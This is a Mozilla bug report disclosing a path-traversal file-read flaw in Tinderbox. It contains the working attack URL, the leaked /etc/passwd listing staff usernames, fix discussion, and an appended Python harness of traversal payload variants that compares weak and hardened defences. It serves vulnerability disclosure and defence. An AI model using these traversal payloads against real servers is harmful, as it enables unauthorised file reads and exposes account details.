Closed Bug 823923 Opened 7 years ago Closed 7 years ago

local file inclusion vulnerability in Tinderbox

Product / Component: Webtools Graveyard :: Tinderbox (defect)
Status: RESOLVED FIXED
Tracking: Not tracked
Reporter: curtisk; Assigned: aki

Hello,

My name is Fabián Cuchietti, I'm a security researcher... In this research I have found a "Local File Inclusion (LFI)".
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page.
This issue by reading some files from the target web server. (IS BUG BOUNTY?)
URL: http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation cg-bugs01&fulltext=1
Parameter Name: logfile
Parameter Type: Querystring
Attack Pattern: ../../../../../../../../../../../etc/passwd
Response:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
nagios:x:101:102:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
bonsai:x:522:105::/home/bonsai:/bin/bash
tinderbox:x:521:104::/home/tinderbox:/bin/bash
varnish:x:103:107:Varnish http accelerator user:/var/lib/varnish:/sbin/nologin
nginx:x:104:108:Nginx user:/var/lib/nginx:/bin/false
hpsmh:x:400:400::/opt/hp/hpsmh:/sbin/nologin
_lldpd:x:105:109:LLDP daemon:/var/run/lldpd:/bin/false
infrasec:x:2324:2324::/home/infrasec:/bin/bash
dmoore:x:599:599::/home/dmoore:/bin/bash
bhourigan:x:1734:1734::/home/bhourigan:/bin/bash
arr:x:1556:1556::/home/arr:/bin/tcsh
rtucker:x:1509:1509::/home/rtucker:/bin/bash
rpina:x:1396:1396::/home/rpina:/bin/bash
mburns:x:1726:1726::/home/mburns:/bin/bash
justdave:x:504:504::/home/justdave:/bin/bash
mrz:x:506:506::/home/mrz:/bin/tcsh
gdestuynder:x:1663:1663::/home/gdestuynder:/bin/bash
shyam:x:1137:1137::/home/shyam:/bin/bash
jvier:x:1449:1449::/home/jvier:/bin/bash
jthomas:x:1700:1700::/home/jthomas:/bin/bash
jcrowe:x:1735:1735::/home/jcrowe:/bin/bash
mlarrain:x:1647:1647::/home/mlarrain:/bin/bash
rbryce:x:1736:1736::/home/rbryce:/bin/bash
pchiasson:x:1645:1645::/home/pchiasson:/bin/bash
tmary:x:1592:1592::/home/tmary:/bin/bash
dmitchell:x:1458:1458::/home/dmitchell:/bin/bash
ghuerta:x:1524:1524::/home/ghuerta:/bin/bash
oremj:x:505:505::/home/oremj:/bin/bash
mpressman:x:1595:1595::/home/mpressman:/bin/bash
nmaul:x:1549:1549::/home/nmaul:/bin/bash
mcoates:x:1306:1306::/home/mcoates:/bin/bash
scabral:x:1808:1808::/home/scabral:/bin/bash
ashish:x:1579:1579::/home/ashish:/bin/bash
amilewski:x:1177:1177::/home/amilewski:/bin/bash
eparker:x:1797:1797::/home/eparker:/bin/bash
ckolos:x:1732:1732::/home/ckolos:/bin/bash
jdow:x:1299:1299::/home/jdow:/bin/bash
cshields:x:1047:1047::/home/cshields:/bin/bash
dgherman:x:1562:1562::/home/dgherman:/bin/bash
jstevensen:x:1679:1679::/home/jstevensen:/bin/bash
jlazaro:x:1303:1303::/home/jlazaro:/bin/bash
rsoderberg:x:1432:1432::/home/rsoderberg:/bin/bash
petef:x:1519:1519::/home/petef:/bin/bash
jwatkins:x:1787:1787::/home/jwatkins:/bin/bash
cliang:x:1795:1795::/home/cliang:/bin/bash
ahill2:x:1541:1541::/home/ahill2:/bin/bash
rmilewski:x:1427:1427::/home/rmilewski:/bin/bash
dparsons:x:1724:1724::/home/dparsons:/bin/bash
bkero:x:1369:1369::/home/bkero:/bin/bash
rhelmer:x:1476:1476::/home/rhelmer:/bin/bash
lthomson:x:5506:5506::/home/lthomson:/bin/bash
afernandez:x:1905:1905::/home/afernandez:/bin/bash
cransom:x:1835:1835::/home/cransom:/bin/bash
jhayashi:x:1848:1848::/home/jhayashi:/bin/bash
bobm:x:1925:1925::/home/bobm:/bin/bash
mmayo:x:1788:1788::/home/mmayo:/bin/bash
bburton:x:1868:1868::/home/bburton:/bin/bash
cturra:x:1909:1909::/home/cturra:/bin/bash
dmaher:x:1924:1924::/home/dmaher:/bin/bash
amckay:x:1217:1217::/home/amckay:/bin/bash
eziegenhorn:x:1892:1892::/home/eziegenhorn:/bin/bash
ayounsi:x:1155:1155::/home/ayounsi:/bin/bash
mhenry:x:1927:1927::/home/mhenry:/bin/bash
juber:x:1959:1959::/home/juber:/bin/bash
ossec:x:401:401::/var/ossec:/sbin/nologin
ossecm:x:402:401::/var/ossec:/sbin/nologin
ossecr:x:403:401::/var/ossec:/sbin/nologin


Best regards,
Fabián Cuchietti.
Flags: sec-bounty?
The showlog.cgi file is located here:

https://mxr.mozilla.org/mozilla/source/webtools/tinderbox/showlog.cgi


Someone else will have to audit the code since I'm not that good at Perl.
Depends on: 824020
You still have not corrected the vulnerability?
reed: Who is the appropriate assignee for this bug?
Flags: needinfo?(reed)
I'll take it.
Assignee: nobody → reed
Flags: needinfo?(reed)
Blocks: 835471
If we're not going to fix it can we just shut tinderbox down? What hasn't migrated to tbpl?
Flags: sec-bounty? → sec-bounty+
Depends on: 842742
http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, root@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.
Apache Server at tinderbox.mozilla.org Port 80
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
(In reply to Michael Henry [:tinfoil] from comment #7)
> http://tinderbox.mozilla.org/showlog.
> cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../
> etc/passwd&buildtime=1356022860&buildname=documentation

Where's the patch that fixed this? Apparently, it was done in bug 842742, which I can't see. Why was a separate bug filed? Work should have been done in this bug. We don't do separate super-hidden bugs for normal security fixes, so why in the world would we do the same here?

The fix, while it may work, is definitely not the best way to do this:

http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&root=/cvsroot&subdir=mozilla/webtools/tinderbox&command=DIFF_FRAMESET&root=/cvsroot&file=showlog.cgi&rev1=1.35&rev2=1.36

Has anybody tried using hex codes for '.' and seeing if it still works (or some other form of obfuscation of the '.')?
Assignee: reed → aki
If you mean .. , f/e, that doesn't work.
Group: webtools-security
Depends on: tinderbox-death
Product: Webtools → Webtools Graveyard
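The question raised above (does a hex-encoded '.' get past the fix?) is easiest to settle with a small harness. The block below is an added Python illustration written for this page; it is not Tinderbox's Perl CGI and not the rev 1.35→1.36 patch linked above (which this page does not show). It assumes a constructed log root (`LOG_ROOT`), a constructed payload set (the report's own `../` pattern, `%2e%2e` dots, the `....//` trick, double encoding, and a benign log name shaped like Tinderbox's), and a hypothetical "strip `../`" filter that stands in for any substring-based fix. It models the one percent-decode a CGI library performs before the script sees the parameter, which is why `%2e%2e` behaves exactly like `..` and why a check that runs after decoding sees no difference, and it contrasts that with an allow-list plus containment check.

```python
import os
import re
import urllib.parse

# Constructed stand-in for the directory the CGI reads logs from; the real
# Tinderbox layout is not reproduced here.
LOG_ROOT = "/var/tinderbox/logs"

# Constructed payloads. "report" is the attack pattern from the bug report;
# the others are variants a tester would try against a fix, plus one benign
# name of the shape Tinderbox log files use.
PAYLOADS = {
    "report":         "../" * 11 + "etc/passwd",
    "hex_dots":       "%2e%2e/" * 11 + "etc/passwd",
    "dot_dot_slash":  "....//" * 4 + "etc/passwd",
    "double_encoded": "%252e%252e/" * 11 + "etc/passwd",
    "benign":         "1356022860.15342.gz",
}


def cgi_decode(raw: str) -> str:
    """The single percent-decode a CGI library applies to a query parameter
    before the script sees it: %2e becomes '.', but %252e only becomes '%2e'."""
    return urllib.parse.unquote(raw)


def escapes_root(path: str) -> bool:
    """True if the lexically normalized path lies outside LOG_ROOT.
    Deployed code should also os.path.realpath() both sides so a symlink
    inside LOG_ROOT cannot point elsewhere; kept lexical here to stay offline."""
    return os.path.commonpath([LOG_ROOT, path]) != LOG_ROOT


def resolve_vulnerable(tree: str, logfile: str) -> str:
    """The pattern behind the report: the parameter is spliced into a path
    with no validation, so '..' components walk out of LOG_ROOT."""
    return os.path.normpath(f"{LOG_ROOT}/{tree}/{logfile}")


def resolve_strip_filter(tree: str, logfile: str) -> str:
    """Hypothetical weak fix (not Tinderbox's patch): delete '../' in one pass.
    A single non-recursive pass turns '....//' into '../'."""
    return os.path.normpath(f"{LOG_ROOT}/{tree}/{logfile.replace('../', '')}")


SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def resolve_safe(tree: str, logfile: str) -> str:
    """Hardened handler: allow-list each parameter as a bare file name
    (no '/', no '%', no '..'), then verify containment of the result anyway."""
    for part in (tree, logfile):
        if not SAFE_NAME.match(part) or ".." in part:
            raise ValueError(f"rejected parameter: {part!r}")
    path = os.path.normpath(f"{LOG_ROOT}/{tree}/{logfile}")
    if escapes_root(path):  # unreachable after the allow-list; defence in depth
        raise ValueError("path escapes log root")
    return path


def evaluate(tree: str = "Bugzilla") -> dict:
    """For each payload, after the CGI-style decode: does the naive handler
    escape LOG_ROOT, does the strip filter escape, does the hardened one accept?"""
    results = {}
    for name, raw in PAYLOADS.items():
        decoded = cgi_decode(raw)
        try:
            resolve_safe(tree, decoded)
            safe_accepts = True
        except ValueError:
            safe_accepts = False
        results[name] = (
            escapes_root(resolve_vulnerable(tree, decoded)),
            escapes_root(resolve_strip_filter(tree, decoded)),
            safe_accepts,
        )
    return results


if __name__ == "__main__":
    for name, (naive, strip, safe) in evaluate().items():
        print(f"{name:15s} naive_escapes={naive!s:5s} "
              f"strip_escapes={strip!s:5s} safe_accepts={safe}")
```

Two things the run makes concrete. First, `hex_dots` is indistinguishable from `report` once the CGI layer has decoded it, so testing `%2e` against a post-decode check cannot add anything, while `double_encoded` survives as a literal `%2e%2e` directory name and traverses nothing. Second, the substring filter stops the reported payload but turns `....//` into `../`, so it escapes on input the unfiltered handler would not have; a filter that edits the string is weaker than one that rejects anything outside a narrow allow-list and then checks where the final path lands.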